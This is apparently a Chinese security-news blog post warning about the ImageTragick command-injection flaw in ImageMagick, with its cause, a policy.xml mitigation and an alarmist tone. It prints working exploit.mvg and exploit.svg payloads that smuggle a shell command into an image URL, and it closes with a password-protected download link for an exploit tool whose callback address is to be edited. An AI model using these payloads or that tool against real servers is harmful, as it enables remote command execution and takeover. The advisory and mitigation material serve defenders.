上传个图片都能拿下服务器!赶紧自检!

  网站上的图片相关功能可以被黑客利用秒取网站服务器控制权!比如传一张图直接就给服务器关机,或执行 “rm -fr /” 删除文件,再或窃取用户敏感数据等,而造成这些后果的只是一张特殊的图片…

  这个时候不得不喊出口号「睡你麻痹,起来 High」,上次 Struts 2 漏洞席卷全球还有余温,这次核弹级漏洞 ImageTragick 来了!赶紧检查自家服务,今夜别睡!

  ~~~~~~~~~~~~~~~

  [紧急预警]

  关于 ImageTragick 漏洞(官网):

  https://imagetragick.com/

  官网上已经给出了好几种测试姿势,比如:

        上传个图片都能拿下服务器!赶紧自检!

  ImageTragick 相关漏洞挖掘测试和漏洞影响自查,请参考:

  http://www.imagemagick.org/script/api.php

  可以看到数目繁多,用了如下组件的都可能受此漏洞影响:

         上传个图片都能拿下服务器!赶紧自检!

  ~~~~~~~~~~~~~~~~~~~~~~~~

  漏洞产生的原因是 ImageMagick 使用 system() 指令调用来处理 HTTPS 请求,而对用户传入的 shell 参数没有做好过滤,导致能注入任意指令执行。

EXPOLIT

exploit.mvg
-=-=-=-=-=-=-=-=-
push graphic-context
viewbox 0 0 640 480
fill 'url(/hack/UploadFiles_8057/201605/20160506095448499.jpg"|ls "-la)'
pop graphic-context

exploit.svg
-=-=-=-=-=-=-=-=-
<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN"
"http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg width="640px" height="480px" version="1.1"
xmlns="SVG namespace" xmlns:xlink=
"XLink namespace">
<image xlink:href="https://hack.77169.com/UploadFiles_8057/201605/20160506095448499.jpg&quot;|ls &quot;-la"
x="0" y="0" height="640px" width="480px"/>
</svg>

$ convert exploit.mvg out.png
total 32
drwxr-xr-x 6 user group 204 Apr 29 23:08 .
drwxr-xr-x+ 232 user group 7888 Apr 30 10:37 ..
...

  最后看一下,有那些网站今天被人搞了!!

       上传个图片都能拿下服务器!赶紧自检!

  ~~~~~~~~~~~~~~~

  临时防护建议(by imagetragick.com):

  使用配置文件暂时禁用 ImageMagick 的部分编码器,可在 “/etc/ImageMagick/policy.xml” 文件中添加如下代码:

<policymap>
  <policy domain="coder" rights="none" pattern="EPHEMERAL" />
  <policy domain="coder" rights="none" pattern="URL" />
  <policy domain="coder" rights="none" pattern="HTTPS" />
  <policy domain="coder" rights="none" pattern="MVG" />
  <policy domain="coder" rights="none" pattern="MSL" />
</policymap>

  详见官方建议: ImageMagick Security Issue ( https://www.imagemagick.org/discourse-server/viewtopic.php?f=4&t=29588 )

  ~~~~~~~~~~~~~~~~~~

  说了半天不带工具,那不是刷流氓吗?

  这个主要是php调用的,asp,aspx应当不影响,反正我测试了没成功,

        上传个图片都能拿下服务器!赶紧自检!

  需要自己修改上线地址

       上传个图片都能拿下服务器!赶紧自检!

  EXP下载链接

  链接: http://pan.baidu.com/s/1c1Xhqvu 密码: bw5w

原文地址:https://hack.77169.com/201605/226384.shtm

本文由 华盟网 作者:怪狗 发表,其版权均为 华盟网 所有,文章内容系作者个人观点,不代表 华盟网 对观点赞同或支持。如需转载,请注明文章来源。

0

相关文章

发表评论

电子邮件地址不会被公开。